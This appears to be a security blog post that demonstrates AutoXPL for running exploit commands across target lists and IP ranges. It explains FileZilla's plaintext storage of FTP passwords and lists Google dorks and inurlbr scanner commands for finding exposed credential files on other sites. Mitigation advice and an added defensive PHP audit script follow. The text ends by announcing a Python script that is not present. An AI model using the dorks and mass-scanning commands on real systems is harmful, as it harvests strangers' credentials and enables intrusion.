<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: large;"><b>Example of a 1-to-1 script:</b></span></div>
<div style="text-align: left;">
<span style="color: red; font-family: 'Courier New', Courier, monospace;">./xpl.sh 'www.google.com.br'</span></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSEqJpN-JsSHg3BIfmGojmfWUKNw8m9wCfVqOsEY_QQ3BE3cH-iuSqbFZ28yuDaR9cGTqK9s2MorL34B8VgYSEB7OVeO32Vhpgv8ZNznFPHVT8xKe_gQslVTDQvRFfY5v7VnCOEjC5D65T/s1600/ping.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: the 1-to-1 ping script run against a single host" border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSEqJpN-JsSHg3BIfmGojmfWUKNw8m9wCfVqOsEY_QQ3BE3cH-iuSqbFZ28yuDaR9cGTqK9s2MorL34B8VgYSEB7OVeO32Vhpgv8ZNznFPHVT8xKe_gQslVTDQvRFfY5v7VnCOEjC5D65T/s640/ping.png" title="1-to-1 ping script" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now let's run it via AutoXPL:</div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: large;">DOWNLOAD:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://github.com/googleinurl/AutoXPL">https://github.com/googleinurl/AutoXPL</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: large;"><b>MENU:</b></span><br />
<pre><span style="color: red;"> -t : SET TARGET.
-f : SET FILE TARGETS.
--range : SET RANGE IP.
--range-rand : SET NUMBE IP RANDOM.
--xpl : SET COMMAND XPL.
Execute:
php autoxpl.php -t target --xpl './xpl _TARGET_'
php autoxpl.php -f targets.txt --xpl './xpl _TARGET_'
php autoxpl.php --range '200.1.10.1,200.1.10.255' --xpl './xpl _TARGET_'
php autoxpl.php --range-rand 20 --xpl './xpl _TARGET_'</span>
</pre>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-size: x-large;"><span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Example of AutoXPL running the script against many targets:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php autoxpl.php <b>-f</b> targets.txt <b>--xpl</b> './xpl.sh _TARGET_'</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red; font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWZj2FXB2nDot5Gv_h-U1QQ7mwpSVmfKJm10DXCspAtIxYCANCff7KAfvUd1X542CbGH5842d_5wPIgDWi0MdD_Dn6zDa-7jQ0vZ5yXR7lyaEu8HTw4fVxQlh-evIzHdBqVmeYQNmwD4La/s1600/Captura+de+tela+de+2015-08-18+22%253A03%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: AutoXPL running xpl.sh against the targets listed in targets.txt" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWZj2FXB2nDot5Gv_h-U1QQ7mwpSVmfKJm10DXCspAtIxYCANCff7KAfvUd1X542CbGH5842d_5wPIgDWi0MdD_Dn6zDa-7jQ0vZ5yXR7lyaEu8HTw4fVxQlh-evIzHdBqVmeYQNmwD4La/s640/Captura+de+tela+de+2015-08-18+22%253A03%253A26.png" title="AutoXPL with a target file" width="640" /></a></div>
<br />
The <span style="color: red; font-family: 'Courier New', Courier, monospace;">--xpl</span> parameter of the AutoXPL script works by executing a command line, so it can even fire off curl, nmap, sqlmap, or that FTP exploit, since we can generate the list of IPs with the script.<br />
<br />
Example using an IP range:<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php autoxpl.php <b>--range</b> '200.1.10.1,200.1.10.255' <b>--xpl</b> './xpl.sh _TARGET_'</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoDIvTKXO_ZFImkAZsjkRR-Q0FzY85uvW6rFExUxznPaN64IKduWjCM3Y-PcX-Qs-wXNKyXZw6bXHMIA7RbnCdaw5g2Dc43JpTB3rUNIumJ4Qpf-YJQTdPNnlTJNAasPPOme4z8YQvZVQf/s1600/Captura+de+tela+de+2015-08-18+22%253A06%253A33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: AutoXPL running xpl.sh across an IP range" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoDIvTKXO_ZFImkAZsjkRR-Q0FzY85uvW6rFExUxznPaN64IKduWjCM3Y-PcX-Qs-wXNKyXZw6bXHMIA7RbnCdaw5g2Dc43JpTB3rUNIumJ4Qpf-YJQTdPNnlTJNAasPPOme4z8YQvZVQf/s640/Captura+de+tela+de+2015-08-18+22%253A06%253A33.png" title="AutoXPL with an IP range" width="640" /></a></div>
<br />
<div>
<br /></div>
</div>
<div style="text-align: left;">
<br /></div>
Accessing sensitive data FileZilla (InurlBR, 2015-08-02)<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">FileZilla FTP <a href="http://blog.inurl.com.br/search/label/password" target="_blank">Passwords</a> now Stored in Plaintext.</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyuhJN1lWHzJeELxvKmxH_975sKTPoXvg_n2W2oXk0cxvsUciOs1_tjYETdwVs0tcM76Ijivmc0vOLOW6xTlkMAxFI_WfKnthQbEWG1y5bgK7F8d2dtBAiDQCwNDTaxLioOjR5145dvyG/s1600/Captura+de+tela+de+2015-08-02+23%253A14%253A43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: FileZilla XML settings file with FTP credentials stored in plain text" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisyuhJN1lWHzJeELxvKmxH_975sKTPoXvg_n2W2oXk0cxvsUciOs1_tjYETdwVs0tcM76Ijivmc0vOLOW6xTlkMAxFI_WfKnthQbEWG1y5bgK7F8d2dtBAiDQCwNDTaxLioOjR5145dvyG/s640/Captura+de+tela+de+2015-08-02+23%253A14%253A43.png" title="FileZilla plaintext credentials" width="640" /></a></div>
<br />
It's an old FileZilla vulnerability, but we can still find servers with this security breach; the <a href="http://blog.inurl.com.br/search/label/vulnerability" target="_blank">vulnerability</a> allows access to sensitive files on the server containing FTP users and passwords.<br />
<br />
FileZilla version ~<b>3.0.9.2</b>+ (and possibly older) stores all <a href="http://blog.inurl.com.br/search/label/ftp" target="_blank">FTP</a> connection data in .xml files in plain text.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">The following files are what you need to know about:</span></b><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">filezilla.xml</span> – <i>Stores most recent server info including password in plaintext.</i><br />
<span style="font-family: Courier New, Courier, monospace;">recentservers.xml</span> – <i>Stores all recent server info including password in plaintext.</i><br />
<span style="font-family: Courier New, Courier, monospace;">sitemanager.xml</span> – <i>Stores all saved sites server info including password in plaintext.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">These files can usually be found in the following directories:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">Windows XP/2K:</span> <i>"C:\Documents and Settings\username\Application Data\FileZilla"</i><br />
<span style="font-family: Courier New, Courier, monospace;">Windows Vista:</span> <i>"C:\Users\username\AppData\Roaming\FileZilla\"</i><br />
<span style="font-family: Courier New, Courier, monospace;">Linux:</span> <i>"/home/username/.filezilla/"</i><br />
<br />
<b>FileZilla configuration files</b><br />
FileZilla is a cross-platform application. That’s why it stores its settings in platform-neutral XML files.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN9d2l3D9-dbqBqWN900t9Zh4mmRCqTl3XKuPbWKAxMItwfjuxf1bbfu_OQHFv_-RBCT8ltx7oqQdk5oYuSSPYuNpZSXFOiXhzpLH0LS7g2OVCQ6HYFHukEU5VoU0Uax2MAA3PCt6pq4p2/s1600/filezilla-configuration-files.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="FileZilla configuration files" border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN9d2l3D9-dbqBqWN900t9Zh4mmRCqTl3XKuPbWKAxMItwfjuxf1bbfu_OQHFv_-RBCT8ltx7oqQdk5oYuSSPYuNpZSXFOiXhzpLH0LS7g2OVCQ6HYFHukEU5VoU0Uax2MAA3PCt6pq4p2/s640/filezilla-configuration-files.png" title="FileZilla configuration files" width="640" /></a></div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">sitemanager.xml </span></b><br />
The XML files are readable and contain the access data; as you can see, everything is stored in plain text, including the password.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOD1JThrFaGmw_RPPvB6oMxQ1ilvBmlNZAWlrLZcbxYZcegb8kcktql1zsql4LmzDslJHf52MrMmOl8mjwG_RzpxaOrHeWToZFLIssZPM7mWa6urvQ7NqhGgqbasC9nLQrANW7djYwCJ_8/s1600/sitemanager-xml.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sitemanager.xml with host, user and password in plain text" border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOD1JThrFaGmw_RPPvB6oMxQ1ilvBmlNZAWlrLZcbxYZcegb8kcktql1zsql4LmzDslJHf52MrMmOl8mjwG_RzpxaOrHeWToZFLIssZPM7mWa6urvQ7NqhGgqbasC9nLQrANW7djYwCJ_8/s320/sitemanager-xml.gif" title="sitemanager.xml" width="320" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>filezilla.xml</b></span><br />
The filezilla.xml file follows the same pattern as <b>sitemanager.xml</b>; its entry starts with the <span style="font-family: Courier New, Courier, monospace;"><LastServer></span> element.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYU46iKv_-S-Z5A297p2dhG74iLHrARSN6xwCA47ifza2vaaDyKBBAfaAq8vyC-2i-Gh7s74WIzd68WTxs-_RSC7yDrm4kVsyqOfRFLeAE4szVXsKu1xcn-I2CPSmRYcw2R-GcsB2LWkIF/s1600/filezilla-xml.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="filezilla.xml with its LastServer entry" border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYU46iKv_-S-Z5A297p2dhG74iLHrARSN6xwCA47ifza2vaaDyKBBAfaAq8vyC-2i-Gh7s74WIzd68WTxs-_RSC7yDrm4kVsyqOfRFLeAE4szVXsKu1xcn-I2CPSmRYcw2R-GcsB2LWkIF/s320/filezilla-xml.gif" title="filezilla.xml" width="320" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Quick connect </b></span><br />
QuickConnect lets you connect to servers without adding them to your administrative panel; when a quick connection is made, it is added to the <b>recentservers.xml</b> file.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Danger?</b></span><br />
Yes: just as you can read these files, malicious applications can do the same, and they can also be read from web servers.<br />
ex:<br />
www.target.com.br/folder/<b><span style="font-family: Courier New, Courier, monospace;">{file.xml}</span></b><br />
www.target.com.br/microsite/geo243/<span style="font-family: Courier New, Courier, monospace;"><b>FileZilla.xml</b></span><br />
www.target.com.br/149224/prg/programok/Total%20Commander/FileZilla/<span style="font-family: Courier New, Courier, monospace;"><b>recentservers.xml</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Other files:</b></span><br />
<ol>
<li><span style="font-family: Courier New, Courier, monospace;">sitemanager.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">recentservers.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">filezilla.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">bookmarks.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">filters.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">layout.xml</span></li>
<li><span style="font-family: Courier New, Courier, monospace;">queue.xml</span></li>
</ol>
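Added example (not code from the original post or from the inurlbr project): a check a server operator can run on their own document root for the exposure described above. It walks the directory for the seven file names listed, confirms the FileZilla3 root element the post uses for validation, and reports every Server or LastServer entry that carries a Pass element, the signal to remove the file from the web root and rotate those credentials. The document root and the sitemanager.xml it inspects are constructed in a temporary directory, so it runs stand-alone.<br />

```php
<?php
// Added example, not code from the original post or from the inurlbr project.
// Audits a web document root for exposed FileZilla settings files; passwords
// are detected but never printed.

// The file names listed in the post.
const FILEZILLA_FILES = ['sitemanager.xml', 'recentservers.xml', 'filezilla.xml',
                         'bookmarks.xml', 'filters.xml', 'layout.xml', 'queue.xml'];

/**
 * Parse one candidate file. Returns null when it is not a FileZilla settings
 * file (wrong root element, or not well-formed XML); otherwise one entry per
 * stored server, flagging whether a password is present.
 */
function inspectFileZillaXml(string $path): ?array
{
    $prev = libxml_use_internal_errors(true);
    $doc = simplexml_load_file($path, 'SimpleXMLElement', LIBXML_NONET);
    libxml_use_internal_errors($prev);
    if ($doc === false || $doc->getName() !== 'FileZilla3') {
        return null;
    }
    $entries = [];
    // sitemanager.xml and recentservers.xml use <Server>; filezilla.xml uses
    // <LastServer>, as the post notes. Both carry Host/User/Pass children.
    foreach ($doc->xpath('//Server | //LastServer') ?: [] as $srv) {
        $entries[] = [
            'host'     => (string) $srv->Host,
            'user'     => (string) $srv->User,
            'has_pass' => isset($srv->Pass) && trim((string) $srv->Pass) !== '',
        ];
    }
    return $entries;
}

/** Walk $docroot; return findings keyed by path relative to it. */
function auditDocroot(string $docroot): array
{
    $findings = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($docroot, FilesystemIterator::SKIP_DOTS));
    foreach ($iter as $file) {
        // Case-insensitive: the post's own example shows "FileZilla.xml".
        if (!in_array(strtolower($file->getFilename()), FILEZILLA_FILES, true)) {
            continue;
        }
        $entries = inspectFileZillaXml($file->getPathname());
        if ($entries !== null) {
            $rel = substr($file->getPathname(), strlen(rtrim($docroot, '/')) + 1);
            $findings[$rel] = $entries;
        }
    }
    return $findings;
}

// --- Constructed document root with one leaked sitemanager.xml (sample data) ---
$docroot = sys_get_temp_dir() . '/fz_audit_' . bin2hex(random_bytes(4));
mkdir("$docroot/microsite/geo243", 0700, true);
$sample = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <User>deploy</User>
      <Pass>constructed-sample-secret</Pass>
    </Server>
  </Servers>
</FileZilla3>
XML;
file_put_contents("$docroot/microsite/geo243/sitemanager.xml", $sample);
// Same file name but not a FileZilla file: the root-element check skips it.
file_put_contents("$docroot/layout.xml", '<layout/>');

foreach (auditDocroot($docroot) as $rel => $entries) {
    foreach ($entries as $e) {
        printf("%s: %s@%s %s\n", $rel, $e['user'], $e['host'],
            $e['has_pass'] ? 'STORES A PASSWORD: remove from the web root and rotate it' : 'no password stored');
    }
}
```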
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Looking for vulnerable servers</b></span><br />
Now let's use the <a href="http://blog.inurl.com.br/search/label/INURLBR" target="_blank">inurlbr</a> tool to search for sites with this exposure and confirm the information.<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Download tool: </span></b><br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Setting command:</b></span><br />
using search engines:<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<b>Choose your dork search</b><br />
<br />
<ul>
<li><span style="font-family: 'Courier New', Courier, monospace;">"\FileZilla\" ext:xml</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:sitemanager.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:recentservers.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:filezilla.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:bookmarks.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:filters.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:layout.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:queue.xml -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:sitemanager.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:recentservers.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:filezilla.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:bookmarks.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:filters.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:layout.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:queue.xml & ext:xml & -github -sourceforge</span></li>
<li><span style="font-family: 'Courier New', Courier, monospace;">inurl:"\FileZilla\" & inurl:(sitemanager.xml | recentservers.xml | filezilla.xml | filters.xml | bookmarks.xml | layout.xml | queue.xml) ext:xml -github -sourceforge</span></li>
</ul>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork</b> 'YOU_DORK'</span><br />
<b>- Setting: </b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork</b> '"\FileZilla\" ext:xml'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET FILE OUTPUT:</span></b><br />
<b>- Setting: </b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> filezilla.txt</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET TYPE VALIDATION: </b></span><br />
<b>- Setting: </b><span style="color: red; font-family: Courier New, Courier, monospace;"><b>-t</b> 2 </span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> 2 The second type tries to validate the error defined by: </span><span style="color: red; font-family: Courier New, Courier, monospace;"><i><b>-a</b> 'VALUE_INSIDE_THE_TARGET'</i></span><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"> It also establishes the connection with the exploit through the GET method.</span><br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span></b>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET STRING VALIDATION:</b></span><br />
Specify the string that will be used on the search script:<br />
Example:<span style="font-family: Courier New, Courier, monospace;"> <span style="color: red;"><b>-a</b> {string}</span></span><br />
Usage: <span style="font-family: Courier New, Courier, monospace;"> <span style="color: red;"><b>-a</b> '<title>hello world</title>'</span></span><br />
If the specified value is found in the target, it is considered vulnerable.<br />
<b>- </b><b>Setting: </b> <span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> '<FileZilla3>'</span><br />
<i>Every FileZilla file has a root tag called <FileZilla3>. It is through this that we validate.</i><br />
<b>Ex</b><i>:</i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8sLz_-r77ytw1BVa6kSoBetZb6Ddat9ZkW4yz03Aq6nGyg6rQxj6NkThPTrNYZaOH4iLKN13AJ18JZo2QazEUe9xcUcguiqm8U2B0GFXW_2o7fJYbPPdYqa-VFJrWzCgFFv7ECENTF7J-/s1600/Captura+de+tela+de+2015-08-02+20%253A41%253A59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Screenshot: the FileZilla3 root tag in an exposed configuration file" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8sLz_-r77ytw1BVa6kSoBetZb6Ddat9ZkW4yz03Aq6nGyg6rQxj6NkThPTrNYZaOH4iLKN13AJ18JZo2QazEUe9xcUcguiqm8U2B0GFXW_2o7fJYbPPdYqa-VFJrWzCgFFv7ECENTF7J-/s640/Captura+de+tela+de+2015-08-02+20%253A41%253A59.png" title="FileZilla3 root tag" width="640" /></a></div>
<i><br /></i>
<i><br /></i>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Full command - </span></b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>using search engines</b></span><b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork</b><span style="color: red; font-family: Courier New, Courier, monospace;"> '"\FileZilla\" ext:xml' </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> filezilla.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-t</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 2</span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-a</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> '<FileZilla3></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">OR SCAN FROM A DORK FILE:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">--dork-file</b><span style="color: red; font-family: Courier New, Courier, monospace;"> dorks.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-s</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> filezilla.txt </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-t</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> 2</span><span style="color: red; font-family: 'Courier New', Courier, monospace;"> </span><b style="color: red; font-family: 'Courier New', Courier, monospace;">-a</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"> '<FileZilla3></span><span style="color: red; font-family: 'Courier New', Courier, monospace;">'</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">OUTPUT PRINT:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpw-v-NxKew0VjWqYgwCK5us0NkiqJ0rK8e4oCChsld4q8xNnEtPHwxHVlsLSHhgMACiE-tHBXibDdanePY29ZozanWR5NveCWgAPrIww4YG8HzIeU-8fwT8bIr2KM2nYF8SxgVjURwvNh/s1600/Captura+de+tela+de+2015-08-02+21%253A11%253A26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Full command - using search engines: php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>' OUTPUT PRINT:" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpw-v-NxKew0VjWqYgwCK5us0NkiqJ0rK8e4oCChsld4q8xNnEtPHwxHVlsLSHhgMACiE-tHBXibDdanePY29ZozanWR5NveCWgAPrIww4YG8HzIeU-8fwT8bIr2KM2nYF8SxgVjURwvNh/s640/Captura+de+tela+de+2015-08-02+21%253A11%253A26.png" title="Full command - using search engines: php inurlbr.php --dork '"\FileZilla\" ext:xml' -s filezilla.txt -t 2 -a '<FileZilla3>' OUTPUT PRINT:" width="640" /></a></div>
<br />
<br />
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Using FileZilla the safe way</b></span><br />
<br />
FileZilla is a great FTP client and I use it myself. But since it doesn’t protect your FTP credentials, you should protect them yourself. Here is what you can do:<br />
<br />
1. Don’t use the “Normal” logon type. There are the “Ask for password” and the “Interactive” types that won’t save your passwords on disk. So malware simply won’t be able to get enough information from FileZilla configuration files to hack your sites.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Pros</b></span><br />
Malware cannot steal your FTP credential from configuration files.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Cons</span></b><br />
You’ll have to enter your password every time you connect to your site.<br />
It won’t save you from more sophisticated spyware such as keyloggers and traffic sniffers. But I hope this sort of trojan can be better detected by your antivirus tools since they need to hook known system functions. To protect yourself from traffic sniffers, always use SFTP instead of FTP (if possible).<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">2. Hosts trick.</span></b> If you manage multiple web sites, interactive logon types may be really inconvenient. There is a trick that can let you use the “Normal” logon type in a more secure manner. You should create aliases of your sites’ addresses in the “hosts” file (on Windows, you can find it in <span style="font-family: Courier New, Courier, monospace;">C:\WINDOWS\system32\drivers\etc\</span>).<br />
<br />
For example you have a site “example.com” with an IP-address "208.xxx.188.166".<br />
To create an alias you need to add the following line into the hosts file:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">208.xxx.188.166 my_example</span><br />
<br />
<b>"my_example" </b>will work the same way as “example.com” when you use it on your computer.<br />
However, on other computers it won’t make any sense. Now use this alias in <a href="http://blog.inurl.com.br/search/label/ftp" target="_blank">FTP</a> connection settings instead of “example.com”. <br />
If hackers manage to steal your FTP credentials, all they’ll have will be: (<span style="font-family: Courier New, Courier, monospace;">host: my_example, user: unmask, password: parasites</span>) – the username/password pair is valid, but the host name doesn’t make any sense to them. It’s like having a key and not knowing where the door is.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Pros</span></b><br />
Once you have added new aliases to the hosts file and to FileZilla Site Manager, you can enjoy the ease of one-click connections.<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Cons</span></b><br />
<br />
This trick will only work as long as malware steals FTP credentials from configuration files verbatim (and I have proof that at least some malware steals the data verbatim). If they only add a simple check that converts host names to IP-addresses before sending the credentials to their central database, the trick will be useless. This trick is better than no protection at all, but you should not count on it.<br />
You’ll need to update the hosts file if IP-addresses change.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">3. Public Key Authentication.</span></b> If your hosting plan included SSH (secure shell), you can use FileZilla in SFTP mode. One of convenient SSH features is public key authentication. And FileZilla supports this type of authorization (I didn’t use it myself, but at least have seen the UI in the “Settings” dialog). FileZilla recognizes PuTTY’s Pageant, so the configuration should be easy if you already use PuTTY for SSH.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Pros</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Secure one-click connections.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Cons</b></span><br />
<br />
This authentication method will only work if your hosting plan includes SSH/SFTP. Unfortunately, this option is rarely included in shared hosting plans.<br />
Creating the keys and configuring FileZilla to use them is not a trivial process.<br />
You might still have to enter a pass phrase when adding keys to the Pageant.<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Other FTP programs</span></b><br />
<br />
In this article I reviewed FileZilla only because it’s a popular FTP client that I have on my computer and it was very easy to demonstrate how little it does to protect users’ FTP credentials. However the same concerns apply to all other programs that have FTP functions: classical FTP clients, web page editors, file managers. Popular applications like DreamWeaver, CuteFTP, Total Commander, etc. account for the majority of FTP credential leaks.<br />
<br />
<b>Solution Source:</b> <a href="http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/" target="_blank">http://blog.unmaskparasites.com/2009/09/01/beware-filezilla-doesnt-protect-your-ftp-passwords/</a><br />
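An added example, not FileZilla's or inurlbr's code, of the check a practitioner would want after reading the above: a Python audit of your own sitemanager.xml. It applies the same root-tag test the scanner runs with -a '&lt;FileZilla3&gt;' and then lists every site whose logon type makes FileZilla keep the password on disk, decoding the base64 form newer releases write (base64 is encoding, not protection; older releases wrote the password in clear text). The sample file is constructed, and the Logontype numbering (0 anonymous, 1 normal, 2 ask for password, 3 interactive, 4 account, 5 key file) is assumed to match FileZilla's.

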